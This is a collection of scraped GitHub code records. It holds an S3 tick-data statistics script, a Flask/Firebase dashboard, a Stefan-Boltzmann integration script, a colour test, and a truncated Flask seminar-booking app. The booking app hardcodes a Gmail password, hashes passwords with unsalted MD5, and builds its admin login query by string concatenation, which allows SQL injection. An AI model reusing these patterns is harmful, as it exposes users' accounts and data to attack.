AskCloseVolumeUpTick\r\n global AskUpStdDeviation\r\n global AskUpProbability\r\n global AskUpMedian\r\n if len(AskUpVolume) > 0 and len(AskUpPrice) > 0:\r\n # 'AskUpVolume_str = AskUpVolume.Clone\r\n TotalLength = len(AskUpVolume)\r\n\r\n AskUpValue = [0 for x in range(TotalLength)]\r\n\r\n for i in range(0, TotalLength - 1):\r\n AskUpValue[i] = AskUpPrice[i] * AskUpVolume[i]\r\n Median = CalculationForMedian(AskUpValue)\r\n # Median=np.median(AskUpValue)\r\n Deviation = CalculateStandardDeviation(AskUpValue)\r\n # Deviation=np.std(AskUpValue)\r\n UpCut = int(((MedianUpCutOff * TotalLength) / 100))\r\n DownCut = int(((MedianDownCutOff * TotalLength) / 100))\r\n\r\n AskUpValue.sort\r\n AskOpenPriceUpTick = AskUpPrice[0]\r\n for i in range(0, TotalLength - 1):\r\n AskPrice = AskUpPrice[i]\r\n AskVolume = AskUpVolume[i]\r\n AskValue = AskPrice * AskVolume\r\n for j in range(DownCut, TotalLength - UpCut - 1):\r\n if AskValue == AskUpValue[j]:\r\n AskPriceCalculationUpTick()\r\n break\r\n AskClosePriceUpTick = AskUpPrice[TotalLength - 1]\r\n AskCloseVolumeUpTick = AskUpVolume[TotalLength - 1]\r\n AskUpStdDeviation = Deviation\r\n AskUpMedian = Median\r\n if TotalLength > 0:\r\n AskUpProbability = AskUpProbability / TotalLength\r\n AskPriceVolumeCalculationUpTick()\r\n else:\r\n SetAskUpToZeero()\r\n\r\n\r\ndef AskPriceCalculationUpTick():\r\n ##Region \"calculation for Price\"\r\n global AskOpenPriceUpTick\r\n global AskClosePriceUpTick\r\n global AskFrequencyUpTick\r\n global AskMinPriceUpTick\r\n global AskMaxPriceUpTick\r\n global AskTickVolumeUpTick\r\n global AskVolume\r\n global AskCloseVolumeUpTick\r\n global AskMinVolumeUpTick\r\n global AskMaxVolumeUpTick\r\n global AskTotalPriceUpTick\r\n global AskTotalSizeUpTick\r\n global AskTotalValueUpTick\r\n if AskOpenPriceUpTick == 0:\r\n AskOpenPriceUpTick = AskPrice\r\n AskClosePriceUpTick = AskPrice\r\n AskFrequencyUpTick = AskFrequencyUpTick + 1\r\n AskMinPriceUpTick = computeLow(AskPrice, AskMinPriceUpTick)\r\n AskMaxPriceUpTick = computeHigh(AskPrice, AskMaxPriceUpTick)\r\n\r\n if AskVolume > AskCloseVolumeUpTick:\r\n AskTickVolumeUpTick = AskTickVolumeUpTick + 1\r\n elif AskVolume < AskCloseVolumeUpTick:\r\n AskTickVolumeUpTick = AskTickVolumeUpTick - 1\r\n AskCloseVolumeUpTick = AskVolume\r\n AskMinVolumeUpTick = computeLow(AskVolume, AskMinVolumeUpTick)\r\n AskMaxVolumeUpTick = computeHigh(AskVolume, AskMaxVolumeUpTick)\r\n AskTotalPriceUpTick = AskTotalPriceUpTick + AskPrice\r\n AskTotalSizeUpTick = AskTotalSizeUpTick + AskVolume\r\n AskTotalValueUpTick = AskTotalValueUpTick + (AskClosePriceUpTick * AskVolume)\r\n\r\n\r\ndef AskPriceVolumeCalculationUpTick():\r\n global AskTotalSizeUpTick\r\n global AskPriceVolumeWeightedUpTick\r\n global AskTotalPriceUpTick\r\n global AskVolumePriceWeightedUpTick\r\n global AskFrequencyUpTick\r\n global ValuePerAskUpTick\r\n\r\n if AskTotalSizeUpTick > 0:\r\n AskPriceVolumeWeightedUpTick = AskTotalValueUpTick / AskTotalSizeUpTick\r\n if AskTotalPriceUpTick > 0:\r\n AskVolumePriceWeightedUpTick = AskTotalValueUpTick / AskTotalPriceUpTick\r\n if AskFrequencyUpTick > 0:\r\n ValuePerAskUpTick = AskTotalValueUpTick / AskFrequencyUpTick\r\n else:\r\n ValuePerAskUpTick = 0\r\n\r\n\r\ndef SetAskUpToZeero():\r\n global AskTickVolumeUpTick\r\n global AskCloseVolumeUpTick\r\n global AskMinVolumeUpTick\r\n global AskMaxVolumeUpTick\r\n global AskTotalSizeUpTick\r\n global AskTotalValueUpTick\r\n global AskOpenPriceUpTick\r\n global AskMinPriceUpTick\r\n global AskMaxPriceUpTick\r\n\r\n AskTickVolumeUpTick = 0\r\n AskCloseVolumeUpTick = 0\r\n AskMinVolumeUpTick = 0\r\n AskMaxVolumeUpTick = 0\r\n AskTotalSizeUpTick = 0\r\n AskTotalValueUpTick = 0\r\n AskOpenPriceUpTick = AskClosePriceUpTick\r\n AskMinPriceUpTick = AskClosePriceUpTick\r\n AskMaxPriceUpTick = AskClosePriceUpTick\r\n\r\n\r\ndef AskDownCalculation():\r\n global AskOpenPriceDownTick\r\n global AskClosePriceDownTick\r\n global AskCloseVolumeDownTick\r\n global AskDownStdDeviation\r\n global AskDownProbability\r\n global AskDownMedian\r\n if len(AskDownVolume) > 0 and len(AskDownPrice) > 0:\r\n # 'AskDownVolume_str = AskDownVolume.Clone\r\n TotalLength = len(AskDownVolume)\r\n # ' AskDownVolume = AskDownVolume.Clone ''(TotalLength ) As Double '' = New Double(TotalLength ) {}\r\n # 'AskDownPrice_str = AskDownPrice.Clone ''.Split(\",\".ToCharArray())\r\n # Dim AskDownPrice(TotalLength - 1) As Double '' = New Double(TotalLength ) {}\r\n # 'TotalLength1 = TotalLength - 1\r\n # AskDownValue = vbObjectInitialize((TotalLength,), Variant)\r\n AskDownValue = [0 for x in range(TotalLength)]\r\n\r\n for i in range(0, TotalLength - 1):\r\n AskDownValue[i] = AskDownPrice[i] * AskDownVolume[i]\r\n Median = CalculationForMedian(AskDownValue)\r\n # Median=np.median(AskDownValue)\r\n Deviation = CalculateStandardDeviation(AskDownValue)\r\n # Deviation=np.std(AskDownValue)\r\n UpCut = int(((MedianUpCutOff * TotalLength) / 100))\r\n DownCut = int(((MedianDownCutOff * TotalLength) / 100))\r\n\r\n AskDownValue.sort\r\n AskOpenPriceDownTick = AskDownPrice[0]\r\n for i in range(0, TotalLength - 1):\r\n AskPrice = AskDownPrice[i]\r\n AskVolume = AskDownVolume[i]\r\n AskValue = AskPrice * AskVolume\r\n for j in range(DownCut, TotalLength - UpCut - 1):\r\n if AskValue == AskDownValue[j]:\r\n AskPriceCalculationDownTick()\r\n break\r\n AskClosePriceDownTick = AskDownPrice[TotalLength - 1]\r\n AskCloseVolumeDownTick = AskDownVolume[TotalLength - 1]\r\n AskDownStdDeviation = Deviation\r\n AskDownMedian = Median\r\n if TotalLength > 0:\r\n AskDownProbability = AskDownProbability / TotalLength\r\n AskPriceVolumeCalculationDownTick()\r\n else:\r\n SetAskDownToZeero()\r\n\r\n\r\ndef AskPriceCalculationDownTick():\r\n ##Region \"calculation for Price\"\r\n global AskOpenPriceDownTick\r\n global AskClosePriceDownTick\r\n global AskFrequencyDownTick\r\n global AskMinPriceDownTick\r\n global AskMaxPriceDownTick\r\n global AskTickVolumeDownTick\r\n global AskVolume\r\n global AskCloseVolumeDownTick\r\n global AskMinVolumeDownTick\r\n global AskMaxVolumeDownTick\r\n global AskTotalPriceDownTick\r\n global AskTotalSizeDownTick\r\n global AskTotalValueDownTick\r\n if AskOpenPriceDownTick == 0:\r\n AskOpenPriceDownTick = AskPrice\r\n AskClosePriceDownTick = AskPrice\r\n AskFrequencyDownTick = AskFrequencyDownTick + 1\r\n AskMinPriceDownTick = computeLow(AskPrice, AskMinPriceDownTick)\r\n AskMaxPriceDownTick = computeHigh(AskPrice, AskMaxPriceDownTick)\r\n\r\n if AskVolume > AskCloseVolumeDownTick:\r\n AskTickVolumeDownTick = AskTickVolumeDownTick + 1\r\n elif AskVolume < AskCloseVolumeDownTick:\r\n AskTickVolumeDownTick = AskTickVolumeDownTick - 1\r\n AskCloseVolumeDownTick = AskVolume\r\n AskMinVolumeDownTick = computeLow(AskVolume, AskMinVolumeDownTick)\r\n AskMaxVolumeDownTick = computeHigh(AskVolume, AskMaxVolumeDownTick)\r\n AskTotalPriceDownTick = AskTotalPriceDownTick + AskPrice\r\n AskTotalSizeDownTick = AskTotalSizeDownTick + AskVolume\r\n AskTotalValueDownTick = AskTotalValueDownTick + (AskClosePriceDownTick * AskVolume)\r\n\r\n\r\ndef AskPriceVolumeCalculationDownTick():\r\n global AskTotalSizeDownTick\r\n global AskPriceVolumeWeightedDownTick\r\n global AskTotalPriceDownTick\r\n global AskVolumePriceWeightedDownTick\r\n global AskFrequencyDownTick\r\n global ValuePerAskDownTick\r\n\r\n if AskTotalSizeDownTick > 0:\r\n AskPriceVolumeWeightedDownTick = AskTotalValueDownTick / AskTotalSizeDownTick\r\n if AskTotalPriceDownTick > 0:\r\n AskVolumePriceWeightedDownTick = AskTotalValueDownTick / AskTotalPriceDownTick\r\n if AskFrequencyDownTick > 0:\r\n ValuePerAskDownTick = AskTotalValueDownTick / AskFrequencyDownTick\r\n else:\r\n ValuePerAskDownTick = 0\r\n\r\n\r\ndef SetAskDownToZeero():\r\n global AskTickVolumeDownTick\r\n global AskCloseVolumeDownTick\r\n global AskMinVolumeDownTick\r\n global AskMaxVolumeDownTick\r\n global AskTotalSizeDownTick\r\n global AskTotalValueDownTick\r\n global AskOpenPriceDownTick\r\n global AskMinPriceDownTick\r\n global AskMaxPriceDownTick\r\n\r\n AskTickVolumeDownTick = 0\r\n AskCloseVolumeDownTick = 0\r\n AskMinVolumeDownTick = 0\r\n AskMaxVolumeDownTick = 0\r\n AskTotalSizeDownTick = 0\r\n AskTotalValueDownTick = 0\r\n AskOpenPriceDownTick = AskClosePriceDownTick\r\n AskMinPriceDownTick = AskClosePriceDownTick\r\n AskMaxPriceDownTick = AskClosePriceDownTick\r\n\r\n\r\ndef devidematrix(a, b):\r\n nRows = len(a)\r\n # nColumns=len(a[0])\r\n Matrix = [0 for y in range(nRows)]\r\n for i in range(0, nRows):\r\n Matrix[i] = a[i] / b[i]\r\n return Matrix\r\n\r\n\r\n#### Main Code starts from Here\r\n\r\n\r\n##Lambda Implementatio\r\ndef IvOiCSVtoArraylmbda(bucket, key, stp):\r\n keystp = 'Controllers/STPKeys.csv'\r\n MatrixSTP = CSVtoPRMTRlmbda(bucket, keystp)\r\n nRows = len(MatrixSTP)\r\n nColumns = len(MatrixSTP[0])\r\n for x in range(0, nRows):\r\n # print(\"print STP:\", MatrixSTP[x][1])\r\n # print(\"print stp:\", stp)\r\n for y in range(0, nColumns):\r\n if (stp == str(MatrixSTP[x][y])):\r\n rowindex = x - 1\r\n columnindex = y\r\n\r\n # print(\"Row, Column\", rowindex, columnindex)\r\n try:\r\n response = s3.get_object(Bucket=bucket, Key=key)\r\n contents = response['Body'].read()\r\n lines = contents.splitlines()\r\n nRows = len(lines)\r\n nColumns = 23\r\n # print(\"nRows: \", nRows)\r\n Matrix = [[0 for x in range(nColumns - 1)] for y in range(nRows - 1)]\r\n lstrt = 0\r\n for line in lines:\r\n lstrt = lstrt + 1\r\n parts = line.split(\",\")\r\n if (lstrt == rowindex + 2):\r\n # print(\"lstrt & rowindex\", lstrt, rowindex)\r\n strt = 0\r\n for part in parts:\r\n strt = strt + 1\r\n if (strt >= 5):\r\n try:\r\n lpart = float(part)\r\n except:\r\n lpart = 0\r\n # print('lstrt, strt, lpart', lstrt, strt, lpart)\r\n Matrix[lstrt - 2][strt - 2] = lpart\r\n # print(\"Writing Matrix for lstrt and selectfrom\", Matrix)\r\n # rMatrix=[row[0:nColumns-1] for row in Matrix[rowindex:rowindex+1]]\r\n rMatrix = [row[4:nColumns] for row in Matrix[rowindex:rowindex + 1]]\r\n # print(\"Writing rMatrix \", rMatrix)\r\n return rMatrix[0]\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\ndef TickCSVtoMatrixlmbda(bucket, key, LastDateTime):\r\n try:\r\n response = s3.get_object(Bucket=bucket, Key=key)\r\n contents = response['Body'].read()\r\n lines = contents.splitlines()\r\n nRows = len(lines)\r\n nColumns = 8\r\n selectfrom = nRows\r\n # print(\"nRows: \", nRows)\r\n Matrix = [[0 for x in range(nColumns - 1)] for y in range(nRows - 1)]\r\n lstrt = 0\r\n datecontrol = 0\r\n for line in lines:\r\n lstrt = lstrt + 1\r\n parts = line.split(\",\")\r\n if (lstrt > 1):\r\n strt = 0\r\n for part in parts:\r\n strt = strt + 1\r\n if (strt <= 2):\r\n if (strt == 1):\r\n dte = part\r\n if (strt == 2):\r\n tme = part\r\n dtetme = dte + \" \" + tme\r\n dtetme = datetime.datetime.strptime(dtetme, '%m/%d/%Y %H:%M:%S')\r\n\r\n if (datecontrol == 0 and dtetme > LastDateTime):\r\n datecontrol = 1\r\n selectfrom = lstrt\r\n\r\n Matrix[lstrt - 2][strt - 2] = dtetme\r\n # print(\"DateTime in Matrix\", Matrix[lstrt-2][strt-2])\r\n elif (datecontrol == 1):\r\n\r\n Matrix[lstrt - 2][strt - 2] = dtetme\r\n # print(\"DateTime in Matrix\", Matrix[lstrt-2][strt-2])\r\n else:\r\n try:\r\n lpart = float(part)\r\n except:\r\n lpart = part\r\n\r\n Matrix[lstrt - 2][strt - 2] = lpart\r\n # print(\"Writing rMatrix for lstrt and selectfrom\", lstrt, selectfrom)\r\n rMatrix = [row[1:7] for row in Matrix[selectfrom:lstrt]]\r\n return rMatrix\r\n\r\n except Exception as e:\r\n rMatrix = [[0 for x in range(7)] for y in range(0)]\r\n return rMatrix\r\n print(e)\r\n print(\r\n 'Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(\r\n keyin, bucketin))\r\n raise e\r\n\r\n\r\ndef CSVtoPRMTRlmbda(bucket, key):\r\n try:\r\n response = s3.get_object(Bucket=bucket, Key=key)\r\n contents = response['Body'].read()\r\n lines = contents.splitlines()\r\n nRows = len(lines)\r\n nColumns = len(lines[0])\r\n # print(\"PRMTR nRows: \", nRows)\r\n # print(\"PRMTR nColumns: \", nColumns)\r\n Matrix = [[0 for x in range(nColumns)] for y in range(nRows)]\r\n # print('Matrix', Matrix)\r\n i = -1\r\n for line in lines:\r\n i = i + 1\r\n # print('i', i)\r\n parts = line.split(\",\")\r\n j = -1\r\n for part in parts:\r\n j = j + 1\r\n # print('j', j)\r\n try:\r\n lpart = float(part)\r\n except:\r\n lpart = part\r\n Matrix[i][j] = lpart\r\n return Matrix\r\n\r\n except Exception as e:\r\n print(e)\r\n print(\r\n 'Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(\r\n keyin, bucketin))\r\n raise e\r\n\r\n\r\ndef MatrixToCSVWritelmbdaOne(bucket, MDPCR, Header, key, LastDateTime, CurrentDateTime, nos):\r\n # print(\"LastDateTime :\", LastDateTime)\r\n # print(\"CurrentDateTime :\", CurrentDateTime)\r\n\r\n nColumnsData = len(MDPCR) ## Tells how many files to write\r\n # nColumnsHeader=len(Header) ## Tells how many files to write\r\n # print('nColumnsData, nColumnsHeader', nColumnsData, nColumnsHeader)\r\n nRows = 0\r\n verystart=1\r\n try:\r\n response = s3.get_object(Bucket=bucket, Key=key)\r\n contents = response['Body'].read()\r\n newbody=contents\r\n lines = contents.splitlines()\r\n nRows = len(lines) - 1\r\n print('nRows & nos', nRows, nos)\r\n #print('I am in Try')\r\n except Exception as e:\r\n verystart=0\r\n #print('I am in except and nos is: ', nos)\r\n newbody = 'DateTime'\r\n newbody = newbody + ',' + str(Header)\r\n newbody = newbody + '\\r\\n'\r\n newbody = newbody + str(CurrentDateTime)\r\n for j in range(nColumnsData):\r\n try:\r\n val = float(MDPCR[j])\r\n except Exception as e:\r\n val = 0\r\n newbody = newbody + ',' + str(val)\r\n newbody = newbody + '\\r\\n'\r\n if (nRows < nos):\r\n for x in range(int(nos - nRows - 1)):\r\n newbody = newbody + str(LastDateTime)\r\n for j in range(nColumnsData):\r\n try:\r\n val = float(MDPCR[j])\r\n except Exception as e:\r\n val = 0\r\n newbody = newbody + ',' + str(val)\r\n newbody = newbody + '\\r\\n'\r\n s3.put_object(Bucket=bucket, Key=key, Body=newbody)\r\n if (nRows > nos):\r\n lstrt = 0\r\n for line in lines:\r\n # print('line', line)\r\n lstrt = lstrt + 1\r\n parts = line.split(\",\")\r\n # print('parts', parts)\r\n if (lstrt == 1):\r\n newbody = 'DateTime'\r\n for j in range(nColumnsData):\r\n newbody = newbody + ',' + str(Header[j])\r\n newbody = newbody + '\\r\\n'\r\n if (lstrt > 1 and lstrt < nos):\r\n strt = 0\r\n for part in parts:\r\n strt = strt + 1\r\n if (strt == 1): newbody = newbody + str(part)\r\n if (strt > 1):\r\n try:\r\n part = float(part)\r\n except Exception as e:\r\n part = 0\r\n newbody = newbody + ',' + str(part)\r\n newbody = newbody + '\\r\\n'\r\n #print('newbody', newbody)\r\n if (nRows < nos and verystart==1):\r\n newbody = contents\r\n for x in range(int(nos - nRows - 1)):\r\n newbody = newbody + str(LastDateTime)\r\n for j in range(nColumnsData):\r\n try:\r\n val = float(MDPCR[j])\r\n except Exception as e:\r\n val = 0\r\n newbody = newbody + ',' + str(val)\r\n newbody = newbody + '\\r\\n'\r\n nRows=len(newbody.splitlines())-1\r\n if (nRows==nos):\r\n print('nRows & nos', nRows, nos)\r\n else:\r\n # print('newbody', newbody)\r\n newbody = newbody + str(CurrentDateTime)\r\n for j in range(nColumnsData):\r\n try:\r\n val = float(MDPCR[j])\r\n except Exception as e:\r\n val = 0\r\n newbody = newbody + ',' + str(val)\r\n newbody = newbody + '\\r\\n'\r\n # print('newbody', newbody)\r\n s3.put_object(Bucket=bucket, Key=key, Body=newbody)\r\n \r\n","repo_name":"ShilazTech/VulturesPick","sub_path":"IOIVDM.py","file_name":"IOIVDM.py","file_ext":"py","file_size_in_byte":95208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31819427648","text":"import firebase_admin\nfrom flask import Flask, render_template\nfrom firebase_admin import credentials\nfrom firebase_admin import db\n\napp = Flask(__name__)\n\n\n# Firebase database 인증 및 앱 초기화\ncred = credentials.Certificate('../mykey.json')\nfirebase_admin.initialize_app(cred, {\n 'databaseURL': 'https://breaker-a66d4-default-rtdb.asia-southeast1.firebasedatabase.app/'\n})\n\n\n@app.route('/')\ndef home():\n return render_template('bar.html')\n\n\n@app.route('/corr')\ndef bar():\n return render_template('index.html')\n\n\n@app.route(\"/\", methods=['GET'])\ndef chart(indicator):\n return render_template(\"chart.html\", indicator=indicator)\n\n\n@app.route('/api/snp/')\ndef stock_data():\n ref = db.reference()\n data = ref.child('S&P500').get()\n return data\n\n\n@app.route('/api/indicator/')\ndef indi_data():\n ref = db.reference()\n data = ref.child('Indicator').get()\n return data\n\n\n@app.route('/api/')\ndef api_data():\n ref = db.reference()\n data = []\n temp1 = ref.child('spy').get()\n temp2 = ref.child('ssec').get()\n temp3 = ref.child('stoxx').get()\n data.append(temp1)\n data.append(temp2)\n data.append(temp3)\n return data\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n\n","repo_name":"26th-recruit-at-True-Friend-DT-Project/7_breaker","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"769903501","text":"#! /usr/bin/env python3\n\n'''\nstefanBoltzmann.py is a python script that calculates a value for the Stefan-Boltzmann constant by finding the\ntotal energy per unit area radiated by a black body as a function of T by using adaptive Simpson's rule to evaluate\nthe integral and then printing out what the constant in front of T is.\n\nJaniris Rodriguez\nPHZ 4151C\nMar 3, 2021\n'''\n\nimport numpy as np\n\ndef adaptiveSimpsonsRule(func, a, b, desiredAccuracy, *additionalArgs):\n '''\n integration using the adaptive Simpson's rule method in one dimension\n\n input:\n func (function): user-defined function to be integrated over\n a (float): lower limit of integral\n b (float): upper limit of integral\n desiredAccuracy (float): approximate accuracy desired for value of integral\n *additionalArgs (tuple): additional arguements to be passed into func if func requires more than one arguement\n\n returns:\n approximate value of integral\n '''\n # starting with 1 slice\n N = 1\n # initializing S,T, and the result of the integral, I, for 1 slice\n if additionalArgs:\n S_current = (func(a, additionalArgs) + func(b, additionalArgs)) / 3.\n else:\n S_current = (func(a) + func(b)) / 3.\n\n T_current = 0\n I_current = (b - a) * S_current\n\n # imitates do-while loop, breaks out of loop when desired accuracy is achieved\n while True:\n\n if N != 1:\n # defining spacing for certain slice number\n h_current = (b - a) / N\n # making sure that this term starts at 0 for summation for new number of slices\n T_current = 0\n\n # sum over k from 1 to N-1 for odd k, adding terms necessary\n if additionalArgs:\n for k in range(1,N,2):\n T_current += func(a + k*h_current, additionalArgs)\n else:\n for k in range(1,N,2):\n T_current += func(a + k*h_current)\n\n # finalizing terms for result of integral for certain slice number\n T_current *= 2/3.\n S_current = S_prev + T_prev\n # result of integral for certain slice number\n I_current = h_current * (S_current + 2*T_current)\n # calculating the approximate accuracy\n epsilon_current = (I_current - I_prev) / 15.\n\n # checks for whether desired accuracy has been achieved\n if abs(epsilon_current) <= abs(desiredAccuracy):\n break\n\n # increments step and establishes variables for next iteration of loop with different slice number\n N *= 2\n T_prev = T_current\n S_prev = S_current\n I_prev = I_current\n\n return I_current\n\n\ndef f(z, constant):\n '''\n defines the function to integrate, change of variable used\n input:\n z (float): integration variable for funtion, z = x / (x + constant)\n constant (float): constant found for shift in change of variable\n returns:\n value of function for given x and constant values\n '''\n # calculate the individual terms needed for sake of readability\n term1 = z**3\n term2 = 1. - z\n\n exponential_num = constant[0] * z\n term3 = np.exp(exponential_num / term2) - 1.\n\n # combine all the terms together\n y = term1 / term2**5\n y /= term3\n\n return y\n\n# main code block\n# necessary constants in SI units\nk_B = 1.38064852e-23 # boltzmann constant\nc = 3.0e8 # speed of light\nhbar = 1.054571817e-34 # planck constant / 2*pi\n\n# constant used when changing variables to ensure peak of function falls in middle of integration range for accuracy\nshift = 2.94753090254\n\n# find constant in front of integral\nconst_denom = 4. * (np.pi)**2 * c**2 * hbar**3\nconst_num = (shift * k_B)**4\nconst = const_num / const_denom\n\n# bounds to integrate over, want to be close to 0 and 1, but those result in divide by 0 error\nlowerLim = 0.000000000000001\nupperLim = 0.999999999999999\n\n# desired accuracy for integral\nepsilon = 1.0e-11\n\n# find value of integral using adaptive Simpson's rule\nintegral = adaptiveSimpsonsRule(f, lowerLim, upperLim, epsilon, shift)\n\n# find stefan-boltzmann constant\nsigma = const * integral\n\nprint(f'Stefan-Boltzmann constant: {sigma:.2e}')\n","repo_name":"janirisrodriguez/Compuational-Physics-HW","sub_path":"stefanBoltzmann.py","file_name":"stefanBoltzmann.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24500004809","text":"import include.tests_header\nfrom include.common import *\nfrom mmgen.color import *\nfrom mmgen.color import _colors\ninit_color()\n\ndef test_color():\n\ttry:\n\t\timport colorama\n\t\tstart_mscolor()\n\texcept:\n\t\tpass\n\n\tgmsg(\"Parsed terminfo 'colors' values:\")\n\n\tfor t,c in (('rxvt',8),('xterm',8),('rxvt-unicode',88),('screen-256color',256),('xterm-256color',256)):\n\t\tret = get_terminfo_colors(t)\n\t\tif ret == None:\n\t\t\tymsg('Warning: unable to get info for terminal {!r}'.format(t))\n\t\t\tcontinue\n\t\tmsg('{}: {}'.format(t,ret))\n\t\tassert c == ret, \"'colors' value for terminal {} ({}) does not match expected value of {}\".format(t,ret,c)\n\n\tret = get_terminfo_colors()\n\tmsg('This terminal ({}): {}'.format(os.getenv('TERM'),ret))\n\n\tgmsg(\"Terminal display:\")\n\n\tfor desc,n in (('auto','auto'),('8-color',8),('256-color',256)):\n\t\tinit_color(num_colors=n)\n\t\tmsg('{:9}: {}'.format(desc,' '.join([globals()[c](c) for c in sorted(_colors)])))\n\ntest_color()\n","repo_name":"totaltrader/mmgen","sub_path":"test/colortest.py","file_name":"colortest.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"38230590642","text":"\"\"\"\nAuthor: Debjyoti Guha\nDate: 08/10/2018\nDescription: A Python-Flask app for booking seminar-hall and Live announcements.\nThe project requires so much of effort if you want to re-use it please mention the Authors in your project.\n\"\"\"\nfrom flask import Flask, render_template, request, redirect, url_for, flash, session\nfrom flask_mail import Mail, Message\nimport pymysql\nimport hashlib\nfrom os import urandom\n\n# Initialize the app and mail server to send mail\napp = Flask(__name__)\napp.secret_key = urandom(100)\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'rboy36901@gmail.com'\napp.config['MAIL_PASSWORD'] = 'Adgjmptw1#'\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\nmail = Mail(app)\n\n# Try to connect to the DB and handle error\ntry:\n db = pymysql.connect(host=\"localhost\", user=\"root\", passwd=\"\", db=\"seminar\")\n cur = db.cursor()\n\nexcept:\n print(\"!---- YOUR SERVER IS NOT RUNNING ----!\")\n exit(0)\n\n\n# Root page after going to localhost(127.0.0.1)\n@app.route('/')\ndef home():\n if not session.get('logged_in'):\n cur.execute(\"SELECT * FROM hall ORDER BY capacity\")\n data = cur.fetchall()\n return render_template('index.html', result=data)\n else:\n return redirect('/index')\n\n\n@app.route('/admin')\ndef dash1():\n return render_template('admin.html')\n\n\n@app.route('/user')\ndef dash():\n return render_template('user.html')\n\n\n@app.route('/register')\ndef dash2():\n session.clear()\n return render_template('register.html')\n\n\n# Fetching FeedBack for Admin\n@app.route('/feedback')\ndef feedback():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n cur.execute(\n \"SELECT u.name,f.datef,u.email,h.hname,feedback FROM feedback f, users u, hall h where f.uid = u.uid and f.hid = h.hid order by f.datef DESC\")\n data = cur.fetchall()\n return render_template('admin/feedbacks.html', result=data)\n cur.execute(\"select * from hall\")\n data = cur.fetchall()\n return render_template('user/feedback.html', result=data)\n\n\n# Getting User FeedBack\n@app.route('/submit', methods=['POST'])\ndef submit():\n if not session.get('logged_in'):\n return render_template('index.html')\n if request.method == \"POST\":\n datef = request.form['datef']\n hall = int(request.form['hall'])\n fk = request.form['feedback']\n cur.execute(\"INSERT INTO feedback (uid,hid,feedback,datef) values (%s, %s, %s, %s)\",\n (session['id'], hall, fk, datef))\n db.commit()\n msg = Message('Feedback response from CONFO', sender='rboy36901@gmail.com', recipients=[session['email']])\n msg.body = \"Your feedback has been recorded successfully. Thanks for your feedback :)\"\n mail.send(msg)\n return render_template('user/thanks.html')\n\n\n# Search and Search Result\n@app.route('/search')\ndef search():\n return render_template('user/search.html')\n\n\n@app.route('/result', methods=['POST'])\ndef result():\n if not session.get('logged_in'):\n return render_template('index.html')\n if request.method == \"POST\":\n datef = request.form['datef']\n datet = request.form['datet']\n cap = int(request.form['hall'])\n cur.execute(\n \"select hname,facility,capacity,description,price from hall h where capacity >= %s and hid not in (select hid from booking where accepted = 1 and datef between %s and %s) order by capacity\",\n (cap, datef, datet))\n data = cur.fetchall()\n return render_template('user/result.html', result=data)\n\n\n# Add New Announcements | view | edit\n@app.route('/addannoun')\ndef addannoun():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n return render_template('admin/addannoun.html')\n\n\n@app.route('/viewannoun')\ndef viewannoun():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n cur.execute(\"SELECT * FROM announcements\")\n data = cur.fetchall()\n return render_template('admin/allannoun.html', announcements=data)\n cur.execute(\"SELECT * FROM announcements\")\n data = cur.fetchall()\n return render_template('user/allannoun.html', announcements=data)\n\n\n@app.route('/announce', methods=['POST'])\ndef announce():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n if request.method == \"POST\":\n text = request.form['text']\n sub = request.form['sub']\n date = request.form['date']\n active = 1\n cur.execute(\"INSERT INTO announcements (sub, comment, datef, active, aid) VALUES ( %s, %s, %s, %s, %s)\",\n (sub, text, date, active, session['id']))\n # flash(\"Data Inserted Successfully\")\n db.commit()\n return redirect(url_for('viewannoun'))\n\n\n@app.route('/removeann/', methods=['GET'])\ndef removeann(id_data):\n if not session.get('logged_in'):\n return render_template('index.html')\n # flash(\"Record Has Been Deleted Successfully\")\n cur.execute(\"DELETE FROM announcements WHERE id=%s\", (id_data,))\n db.commit()\n return redirect(url_for('viewannoun'))\n\n\n# Accept | Reject Booking\n@app.route('/approve')\ndef approve():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n cur.execute(\n \"SELECT name,datef,datet,email,ph,hname,comment,accepted,bid,paid FROM booking b,users u, hall h,payment p where b.bid = p.pid and b.uid = p.uid and b.hid = p.hid and b.hid = h.hid and b.uid = u.uid and accepted = 0\")\n data = cur.fetchall()\n return render_template('admin/approve.html', applications=data)\n\n\n@app.route('/accept/', methods=['GET'])\ndef accept(id_data):\n if not session.get('logged_in'):\n return render_template('index.html')\n # flash(\"Approved\")\n cur.execute(\"UPDATE booking SET accepted=1 WHERE bid=%s\", (id_data))\n db.commit()\n return redirect(url_for('approve'))\n\n\n@app.route('/reject/', methods=['GET'])\ndef reject(id_data):\n if not session.get('logged_in'):\n return render_template('index.html')\n # flash(\"Rejected\")\n cur.execute(\"UPDATE booking SET accepted=2 WHERE bid=%s\", (id_data))\n db.commit()\n return redirect(url_for('approve'))\n\n\n# Admin | User Login\n@app.route('/adminlogin', methods=['POST'])\ndef do_admin_login():\n email = request.form['email']\n p = request.form['password']\n password = hashlib.md5(p.encode()).hexdigest()\n cur.execute(\"SELECT * from admin where email = '\" + email + \"' and pass='\" + password + \"'\")\n data = cur.fetchone()\n if data is None:\n flash('wrong credentials!')\n return dash1()\n else:\n session['logged_in'] = True\n session['username'] = data[1]\n session['email'] = data[3]\n session['phone'] = data[4]\n session['id'] = 